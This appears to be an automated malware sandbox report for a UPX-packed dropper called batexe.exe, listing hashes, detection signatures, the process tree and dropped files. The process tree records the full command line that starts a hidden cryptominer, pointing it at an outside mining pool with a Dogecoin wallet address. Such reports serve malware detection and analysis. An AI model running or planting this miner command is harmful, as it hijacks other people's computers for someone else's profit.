73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
304s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
24-02-2024 03:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4736	b2e.exe
1320	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1320	cpuminer-sse2.exe
1320	cpuminer-sse2.exe
1320	cpuminer-sse2.exe
1320	cpuminer-sse2.exe
1320	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/324-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 324 wrote to memory of 4736	324	batexe.exe	74
PID 324 wrote to memory of 4736	324	batexe.exe	74
PID 324 wrote to memory of 4736	324	batexe.exe	74
PID 4736 wrote to memory of 4484	4736	b2e.exe	75
PID 4736 wrote to memory of 4484	4736	b2e.exe	75
PID 4736 wrote to memory of 4484	4736	b2e.exe	75
PID 4484 wrote to memory of 1320	4484	cmd.exe	78
PID 4484 wrote to memory of 1320	4484	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:324
- C:\Users\Admin\AppData\Local\Temp\7474.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\7474.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7474.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\76B6.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4484
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1320

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7474.tmp\b2e.exe

Filesize
1.6MB

MD5
c6467b6b525e93623744663dc5ef4bd6

SHA1
2845e78520a1cf0ddcea083a8444dc4df91bc011

SHA256
d5b9a6b620ae6f67f3f533074ed2f4243181986c769882b6576c52d12f10587f

SHA512
929a6c672d1b4b2d9532afce6cce82d756e80be1fc8a44726db94be4e6ddbb0157c5867c964c5a38ad00bb945a95cf5b5e9330f372e34662cdf76e88a0a1e5f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7474.tmp\b2e.exe

Filesize
1.2MB

MD5
5aa5296c87d1839509bb0318213ff33c

SHA1
875df00bccecc08f8b471a9ec148d45b1a94f8e4

SHA256
0399f68c8fc40a4fac713a8ac253290749fe99d3d5d13832aee2abce9d5d5de1

SHA512
19c533800bfa9927f654c73b289e27dccca78f082a2d0310257e6da7b04ad890332297796830867c104184aa8e4076717abedf28a23df42bd748ae24daefc92d

Download Submit
C:\Users\Admin\AppData\Local\Temp\76B6.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
520KB

MD5
190f010d36b5e28299717dca0b9fed4d

SHA1
9eff365b037a70c78dc85d78905f1e97aea26534

SHA256
4094632ec6c9b91601c9213563e51bef419937fa25209882c3bf762070a26856

SHA512
c87796bb32142813ab40f1a4b21b0951589f9381102612fce116c2e459d82119a9fc96fbb486ef35c01a5e1d918d8fad444a696b052fdd7e490a46359f7ace67

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
314KB

MD5
7b19a91e1a67e9737e9cf92ee4ecdaac

SHA1
07927541290d8ec938342f8476773d7de129b99c

SHA256
dfaa81df273dc6e922adfbbd6d2b2262e9fb2c01a5b7a72634e1255a2eab5da0

SHA512
393e6ac8ead14ebe7548e3428d3ce467b64719a67e64f9515ede2d359497d95e9ba005968d08ffbe9717ba2209a2944c5f905e3a9a40948d871647f23aa6a48c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
376KB

MD5
3357c9885ec63dee69718d02466e41e4

SHA1
423a40071a64b87ab0f91278d8c90cade1cd0d8b

SHA256
667d62ab94b694b9f69a34b40b53ac7a326caf120fa7af7ff9905a0dac1c38f2

SHA512
2cf67ae4e0a0ee1dc681334d4b81f321d6c30e81ffff634a41cba15d08aac41acb70256576dab91d87a7d5866aaceecd0e51479b0c3ea5fc666e5bf71974b6ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
486KB

MD5
14854ac4949f5f82f6493b985d077fef

SHA1
bc9f1c743c6f9421bb7f4caef209d3b5c4aab454

SHA256
f3b6aa3fbc589aeee0382b4b03605f8e8c6bf285db72a09e684d479cfdc48ba6

SHA512
b42a3228edd8968f8424c4c1fd0f56fccfcfd54f774ed7f0c8bdc56a9bfbc7cb4ca80ef98302a45ce1108b99ff0762cb1f2409d0375fa03df50a14fbd571c228

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
520KB

MD5
50d7ad7bdfb45b9301dbd8a75ac856f0

SHA1
ff0895fe73d10c8d6e4e22c6ff40c544c51e3337

SHA256
581c865935de8d4389fc3bf06a35f0ce7f350abd312e48d99316fb48c9326af0

SHA512
d76404b2b05e3637fbff072dfc9d4576a3923c51e6f73f00d5d079fb8f93ee1fbfb777a5d89e577b8f68fa82c2c80fdfe3d039462b932364d735b4dfd33b81fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
219KB

MD5
7e7f6a9cfd66537fedd730cfeb91cc42

SHA1
de0efa0fdc01a2881ea671d46053acb7c0f60a63

SHA256
7d31bbd5066fa8c3d9bca298aa47ccfbec9ff5939c6782ab62bc72bea112cf98

SHA512
00c9bcf1f5d57a1398482da8be5c42b1808dab81dbe7d743f3b657e007a920bb147c6416455c48a008ffac26b9f79f72762c2fd1e028a2201bb88f6b89136dab

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
435KB

MD5
64bb4f8b47691175fda022f7e4ddae83

SHA1
8bccae6d067198476256e3b947f7d9e8b48e14c5

SHA256
8bac938caac50c0a6723696c5345390636aea30b81b46861b0ebdd468d6cb386

SHA512
7ed0f87410564e23b3ecb84e0727421a5a2790ca143f270d77afa4d9cab2023130858e0ed55f434b07be8f710f6353233838aded5cf483aa708a0cc1f9e0d9ca

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
271KB

MD5
6d1eef8fb5778682ecf19b6e46115749

SHA1
0c98542505dbed5bb9549d1c0bb77b1bd944cb31

SHA256
47965b38368919df25f8db100bb40b8ded93ab521a6e961d68ec2bccaf669021

SHA512
b7e96a971548bf3b855e4cc84b45043e2f08ae47fcf3f9e3112c1cf70af4e0697901bda7f87446e4e1b1581808fd4241e0d3cb585c9c7c9ff08b905dd8bbca53

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
327KB

MD5
d89d3e6af3994be187af3c96893b780e

SHA1
b1e71f3c1d16e02fce413f142c85802000b25377

SHA256
c005411ca047f664a722b8267ff9b424edab77604cd2ccec49cae5dd86085373

SHA512
fadf61bd37af9c39db78c9f8a3bdd7e4afb148af0f3bc7fc201e6b0e7263a5a21e0c7958555300194be53772c40a8ec9fb4655d2e9c51f4a1b8b1de2d724f4f4

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
401KB

MD5
ee45c3d03adc46590653e9d921044fa5

SHA1
3d340022acd5b6d143358247d14bff2380e48cf0

SHA256
20c2fdfd8e915deec1465c4f420c880ca78e4d8f1e586f92a56da645644f03e1

SHA512
92a53b116a373ca2f0ed021ffd5340cd960f39836e1088ba0686284e6b1e642096089115272461c1dbf5a8394dac04b059c67d7ee099efedd38b70caeef5b2a4

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
339KB

MD5
b41ae57cff9ea59f0e276982dd6530ed

SHA1
327c6fb35f1647a640a1190f2983b1444d6c6380

SHA256
9ac37e503d49852c1663dccca9b7302af564a55dd5081afebd232e1d0279a1b1

SHA512
f058db6a91dc8b8dfbfd3a21574967cde4cb794d3b122641bd0e5e7e3a29062e79617f37a262e2340a334984468c861fb982c9fca818a6f77d0d0bdcf8d4ff2c

Download Submit
memory/324-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/1320-42-0x00000000596F0000-0x0000000059788000-memory.dmp

Filesize
608KB

Download
memory/1320-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1320-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1320-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1320-43-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1320-44-0x0000000001110000-0x00000000029C5000-memory.dmp

Filesize
24.7MB

Download
memory/1320-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1320-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1320-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1320-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1320-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1320-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1320-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1320-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1320-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1320-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4736-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4736-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download